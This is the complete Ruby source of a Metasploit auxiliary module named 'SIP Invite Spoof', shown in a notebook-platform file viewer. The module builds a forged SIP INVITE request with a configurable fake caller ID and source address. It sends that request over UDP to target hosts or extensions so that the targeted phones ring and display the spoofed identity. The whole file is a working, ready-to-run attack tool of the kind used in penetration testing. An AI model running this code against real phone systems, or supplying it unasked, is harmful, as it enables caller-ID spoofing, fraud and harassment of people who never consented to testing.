Real-time collaboration for Jupyter Notebooks, Linux Terminals, LaTeX, VS Code, R IDE, and more,
all in one place.

1
##
2
# This module requires Metasploit: https://metasploit.com/download
3
# Current source: https://github.com/rapid7/metasploit-framework
4
##
5

6
class MetasploitModule < Msf::Auxiliary
7
  include Msf::Exploit::Remote::Udp
8
  include Msf::Auxiliary::Scanner
9

10
  def initialize
11
    super(
12
      'Name'           => 'SIP Invite Spoof',
13
      'Description'    => %q{
14
        This module will create a fake SIP invite request making the targeted device ring
15
        and display fake caller id information.
16
      },
17
      'Author'         =>
18
        [
19
          'David Maynor <dave[at]erratasec.com>', # original module
20
          'ChrisJohnRiley' # modifications
21
        ],
22
      'License'        =>  MSF_LICENSE
23
    )
24

25
    deregister_udp_options
26
    register_options(
27
      [
28
        Opt::RPORT(5060),
29
        OptString.new('SRCADDR', [true, "The sip address the spoofed call is coming from",'192.168.1.1']),
30
        OptString.new('MSG', [true, "The spoofed caller id to send","The Metasploit has you"]),
31
        OptString.new('EXTENSION', [false, "The specific extension or name to target", nil]),
32
        OptString.new('DOMAIN', [false, "Use a specific SIP domain", nil])
33
      ])
34
    register_advanced_options(
35
      [
36
        OptAddress.new('SIP_PROXY_NAME', [false, "Use a specific SIP proxy", nil]),
37
        OptPort.new('SIP_PROXY_PORT', [false, "SIP Proxy port to use", 5060])
38
      ])
39
  end
40

41

42
  def run_host(ip)
43

44
    begin
45

46
      name = datastore['MSG']
47
      src = datastore['SRCADDR']
48
      ext = datastore['EXTENSION']
49
      dom = datastore['DOMAIN']
50
      sphost = datastore['SIP_PROXY_NAME']
51
      spport = datastore['SIP_PROXY_PORT'] || 5060
52
      conn_string = ''
53

54
      if not ext.nil? and not ext.empty?
55
        # set extension name/number
56
        conn_string = "#{ext}@"
57
      end
58

59
      if not dom.nil? and not dom.empty?
60
        # set domain
61
        conn_string << "#{dom}"
62
      else
63
        conn_string << "#{ip}"
64
      end
65

66
      # set Route header if SIP_PROXY is set
67
      if not sphost.nil? and not sphost.empty?
68
        route = "Route: <sip:#{sphost}:#{spport};lr>\r\n"
69
      end
70

71
      connect_udp
72

73
      print_status("Sending Fake SIP Invite to: #{conn_string}")
74
      print_status("Using SIP proxy #{sphost}:#{spport}") if route
75

76
      req =  "INVITE sip:#{conn_string} SIP/2.0" + "\r\n"
77
      # add Route: header to req if SIP_PROXY is set
78
      req << route if route
79
      req << "To: <sip:#{conn_string}>" + "\r\n"
80
      req << "Via: SIP/2.0/UDP #{ip}" + "\r\n"
81
      req << "From: \"#{name}\"<sip:#{src}>" + "\r\n"
82
      req << "Call-ID: #{(rand(100)+100)}#{ip}" + "\r\n"
83
      req << "CSeq: 1 INVITE" + "\r\n"
84
      req << "Max-Forwards: 20" +  "\r\n"
85
      req << "Contact: <sip:#{conn_string}>" + "\r\n\r\n"
86

87
      udp_sock.put(req)
88
      disconnect_udp
89

90
    rescue Errno::EACCES
91
    end
92

93
  end
94
end
95

96